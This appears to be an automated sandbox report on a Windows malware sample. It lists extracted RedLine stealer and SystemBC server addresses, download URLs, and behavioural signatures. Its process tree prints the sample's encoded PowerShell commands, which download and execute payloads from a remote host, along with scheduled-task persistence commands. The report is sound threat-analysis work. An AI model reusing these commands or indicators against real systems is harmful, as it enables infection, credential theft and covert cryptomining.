Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
06-05-2023 05:11
Static task
static1
Behavioral task
behavioral1
Sample
0e4e3cdacfbe29fdc3e189e52ee8228e.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
0e4e3cdacfbe29fdc3e189e52ee8228e.exe
Resource
win10v2004-20230221-en
General
-
Target
0e4e3cdacfbe29fdc3e189e52ee8228e.exe
-
Size
82KB
-
MD5
0e4e3cdacfbe29fdc3e189e52ee8228e
-
SHA1
59bdf38588f8fefefd49aa748dac4d025e9d0ec3
-
SHA256
ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
-
SHA512
4356a79c3c15f6bdd5c9e465f99cf5b5ea90edcf9e6e84be79cd3e128b3565462af4ce3982077f9f0b11035a30c3caedeae2ca4a62bc74eb6dc319c2236d302a
-
SSDEEP
1536:Vdbe0uWRLLmR/epMMj1McUa33271MT1AosEeR9m+dIs:Tb/RLLmJMMMjK63E1MT1zr+dp
Malware Config
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Extracted
systembc
185.161.248.16:4440
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
OneDrive.exeOneDrive.exedescription pid process target process PID 1960 created 756 1960 OneDrive.exe Explorer.EXE PID 1960 created 756 1960 OneDrive.exe Explorer.EXE PID 1960 created 756 1960 OneDrive.exe Explorer.EXE PID 3084 created 756 3084 OneDrive.exe Explorer.EXE PID 3084 created 756 3084 OneDrive.exe Explorer.EXE PID 3084 created 756 3084 OneDrive.exe Explorer.EXE PID 3084 created 756 3084 OneDrive.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral2/memory/3084-262-0x00007FF750EC0000-0x00007FF75188A000-memory.dmp xmrig behavioral2/memory/340-289-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-294-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-299-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-303-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-308-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-312-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-316-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-320-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-324-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-328-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-332-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig behavioral2/memory/340-337-0x00007FF70D560000-0x00007FF70DD4F000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 3 3096 powershell.exe 4 4776 powershell.exe 5 4228 powershell.exe 37 3096 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
dllhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
lsass.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation lsass.exe -
Executes dropped EXE 5 IoCs
Processes:
OneDrive.exedllhost.exelsass.exeOneDrive.exelsass.exepid process 1960 OneDrive.exe 3060 dllhost.exe 4744 lsass.exe 3084 OneDrive.exe 1940 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Wine dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
dllhost.exelsass.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run dllhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
Processes:
dllhost.exelsass.exelsass.exepid process 3060 dllhost.exe 4744 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe 1940 lsass.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exepowershell.exeOneDrive.exedescription pid process target process PID 4228 set thread context of 3476 4228 powershell.exe RegSvcs.exe PID 4776 set thread context of 2032 4776 powershell.exe RegSvcs.exe PID 3084 set thread context of 2060 3084 OneDrive.exe conhost.exe PID 3084 set thread context of 340 3084 OneDrive.exe conhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegSvcs.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 444 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
lsass.exepid process 1940 lsass.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exeRegSvcs.exedllhost.exeOneDrive.exepowershell.exepid process 4776 powershell.exe 4656 powershell.exe 3096 powershell.exe 4228 powershell.exe 3096 powershell.exe 4656 powershell.exe 4776 powershell.exe 4228 powershell.exe 1960 OneDrive.exe 1960 OneDrive.exe 1960 OneDrive.exe 1960 OneDrive.exe 2032 RegSvcs.exe 2032 RegSvcs.exe 3060 dllhost.exe 3060 dllhost.exe 1960 OneDrive.exe 1960 OneDrive.exe 2032 RegSvcs.exe 3084 OneDrive.exe 3084 OneDrive.exe 3084 OneDrive.exe 3084 OneDrive.exe 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 3084 OneDrive.exe 3084 OneDrive.exe 3084 OneDrive.exe 3084 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeRegSvcs.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 3476 RegSvcs.exe Token: SeShutdownPrivilege 2256 powercfg.exe Token: SeCreatePagefilePrivilege 2256 powercfg.exe Token: SeShutdownPrivilege 216 powercfg.exe Token: SeCreatePagefilePrivilege 216 powercfg.exe Token: SeShutdownPrivilege 4516 powercfg.exe Token: SeCreatePagefilePrivilege 4516 powercfg.exe Token: SeShutdownPrivilege 4560 powercfg.exe Token: SeCreatePagefilePrivilege 4560 powercfg.exe Token: SeDebugPrivilege 2032 RegSvcs.exe Token: SeShutdownPrivilege 4828 powercfg.exe Token: SeCreatePagefilePrivilege 4828 powercfg.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeShutdownPrivilege 1832 powercfg.exe Token: SeCreatePagefilePrivilege 1832 powercfg.exe Token: SeShutdownPrivilege 636 powercfg.exe Token: SeCreatePagefilePrivilege 636 powercfg.exe Token: SeShutdownPrivilege 1052 powercfg.exe Token: SeCreatePagefilePrivilege 1052 powercfg.exe Token: SeIncreaseQuotaPrivilege 3036 powershell.exe Token: SeSecurityPrivilege 3036 powershell.exe Token: SeTakeOwnershipPrivilege 3036 powershell.exe Token: SeLoadDriverPrivilege 3036 powershell.exe Token: SeSystemProfilePrivilege 3036 powershell.exe Token: SeSystemtimePrivilege 3036 powershell.exe Token: SeProfSingleProcessPrivilege 3036 powershell.exe Token: SeIncBasePriorityPrivilege 3036 powershell.exe Token: SeCreatePagefilePrivilege 3036 powershell.exe Token: SeBackupPrivilege 3036 powershell.exe Token: SeRestorePrivilege 3036 powershell.exe Token: SeShutdownPrivilege 3036 powershell.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeSystemEnvironmentPrivilege 3036 powershell.exe Token: SeRemoteShutdownPrivilege 3036 powershell.exe Token: SeUndockPrivilege 3036 powershell.exe Token: SeManageVolumePrivilege 3036 powershell.exe Token: 33 3036 powershell.exe Token: 34 3036 powershell.exe Token: 35 3036 powershell.exe Token: 36 3036 powershell.exe Token: SeIncreaseQuotaPrivilege 3036 powershell.exe Token: SeSecurityPrivilege 3036 powershell.exe Token: SeTakeOwnershipPrivilege 3036 powershell.exe Token: SeLoadDriverPrivilege 3036 powershell.exe Token: SeSystemProfilePrivilege 3036 powershell.exe Token: SeSystemtimePrivilege 3036 powershell.exe Token: SeProfSingleProcessPrivilege 3036 powershell.exe Token: SeIncBasePriorityPrivilege 3036 powershell.exe Token: SeCreatePagefilePrivilege 3036 powershell.exe Token: SeBackupPrivilege 3036 powershell.exe Token: SeRestorePrivilege 3036 powershell.exe Token: SeShutdownPrivilege 3036 powershell.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeSystemEnvironmentPrivilege 3036 powershell.exe Token: SeRemoteShutdownPrivilege 3036 powershell.exe Token: SeUndockPrivilege 3036 powershell.exe Token: SeManageVolumePrivilege 3036 powershell.exe Token: 33 3036 powershell.exe Token: 34 3036 powershell.exe Token: 35 3036 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
lsass.exelsass.exepid process 4744 lsass.exe 1940 lsass.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
0e4e3cdacfbe29fdc3e189e52ee8228e.exepowershell.exepowershell.exepowershell.execmd.execmd.exeOneDrive.exelsass.execmd.exedescription pid process target process PID 3100 wrote to memory of 4656 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 4656 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 4228 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 4228 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 3096 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 3096 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 4776 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 3100 wrote to memory of 4776 3100 0e4e3cdacfbe29fdc3e189e52ee8228e.exe powershell.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4228 wrote to memory of 3476 4228 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 4776 wrote to memory of 2032 4776 powershell.exe RegSvcs.exe PID 3096 wrote to memory of 1960 3096 powershell.exe OneDrive.exe PID 3096 wrote to memory of 1960 3096 powershell.exe OneDrive.exe PID 3284 wrote to memory of 2256 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 2256 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 216 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 216 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 4516 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 4516 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 4560 3284 cmd.exe powercfg.exe PID 3284 wrote to memory of 4560 3284 cmd.exe powercfg.exe PID 3096 wrote to memory of 3060 3096 powershell.exe dllhost.exe PID 3096 wrote to memory of 3060 3096 powershell.exe dllhost.exe PID 3096 wrote to memory of 3060 3096 powershell.exe dllhost.exe PID 3096 wrote to memory of 4744 3096 powershell.exe lsass.exe PID 3096 wrote to memory of 4744 3096 powershell.exe lsass.exe PID 3096 wrote to memory of 4744 3096 powershell.exe lsass.exe PID 2864 wrote to memory of 4828 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 4828 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 1832 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 1832 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 636 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 636 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 1052 2864 cmd.exe powercfg.exe PID 2864 wrote to memory of 1052 2864 cmd.exe powercfg.exe PID 3084 wrote to memory of 2060 3084 OneDrive.exe conhost.exe PID 3084 wrote to memory of 340 3084 OneDrive.exe conhost.exe PID 4744 wrote to memory of 3508 4744 lsass.exe schtasks.exe PID 4744 wrote to memory of 3508 4744 lsass.exe schtasks.exe PID 4744 wrote to memory of 3508 4744 lsass.exe schtasks.exe PID 4744 wrote to memory of 1940 4744 lsass.exe lsass.exe PID 4744 wrote to memory of 1940 4744 lsass.exe lsass.exe PID 4744 wrote to memory of 1940 4744 lsass.exe lsass.exe PID 4744 wrote to memory of 4640 4744 lsass.exe cmd.exe PID 4744 wrote to memory of 4640 4744 lsass.exe cmd.exe PID 4744 wrote to memory of 4640 4744 lsass.exe cmd.exe PID 4640 wrote to memory of 444 4640 cmd.exe timeout.exe PID 4640 wrote to memory of 444 4640 cmd.exe timeout.exe PID 4640 wrote to memory of 444 4640 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1960 -
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3060 -
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:16 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:3508 -
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD7D.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3476 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:216 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵PID:3536
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:4340
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2060
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:340
-
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3084
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
410B
MD524cfd42a8de70b38ed70e1f8cf4eda1c
SHA1e447168fd38da9175084b36a06c3e9bbde99064c
SHA25693b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA5125c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
1KB
MD559cf934cb9423ae365303b9b254219d2
SHA1e67ada1d9c39fa2ce039f87afcf2107e0fc36aaa
SHA256a0bb67b3d402445845eabf82e660aaf63dee4becf899d727eaedd6c4ab9a8004
SHA512122e66c756f48622ca7ea3fc657f36731fbfc59d5e92ad1702ec26f4d30f426492e9b6caaaea3249b56e70a48ecc8b25d6c127cc176f25de25df4cb700ba6692
-
Filesize
1KB
MD5f8d061cb5bbb2559aaf515aec28227a0
SHA124251cc79b5c4f61c8154be0a18c5127713c796f
SHA256ce7532548c92e3d3da457e2e8fa83ad4077a52af322c2b8635ca19cbbdc38269
SHA512a02b2b0f43fef99513543d3be68c2fcad0dd6e66aa6c63e58f9874a51c27f58cdac79c4d9059a92d6a3e5b5235c9ad294abd2716109335f917e7df092980bf8f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
